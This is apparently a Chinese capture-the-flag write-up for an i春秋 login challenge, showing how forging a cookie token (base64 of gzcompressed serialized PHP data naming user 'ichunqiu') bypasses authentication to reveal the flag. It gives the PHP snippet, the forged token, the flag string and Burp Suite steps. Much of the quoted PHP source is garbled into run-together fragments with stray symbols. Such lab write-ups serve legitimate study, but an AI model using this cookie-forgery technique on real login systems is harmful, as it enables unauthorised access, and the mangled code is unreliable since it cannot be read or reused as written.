打开是个很普通的登录网页
查看源码看看有没有东西
找到绿色的提示,可能是账号密码,试试
repeatergo
request
show:1
Goflag
phpcommon.php$_GET, $_POST, $_SESSION, $_COOKIEif$requset['token']iflogin($requset['token'])base64
db为class dbrowdbuserlogin[‘user’]ichunqiuflagrowlogin[‘pass’]┴―┴ ";
login[‘user’]ichunqiu
login[‘user’]php
<?php $a = array('user'=>'ichunqiu'); $a = base64_encode(gzcompress(serialize($a))); echo $a ?> user
eJxLtDK0qi62MrFSKi1OLVKyLraysFLKTM4ozSvMLFWyrgUAo4oKXA==
最后有两种方法传入token的值
一:firefoxcookie editorcookietoken
flag
flag{f3ac41fd-885a-433a-a6ae-87c25ce3e0d2}
二:使用bp传入
在Proxy中写入cookie的补充值token然后传入repeater,补上show:1,go一下出现flag
注:最近i春秋平台老是出现flag错误的回报,明明是正确的,这里就需要多次尝试,或则重新创建题目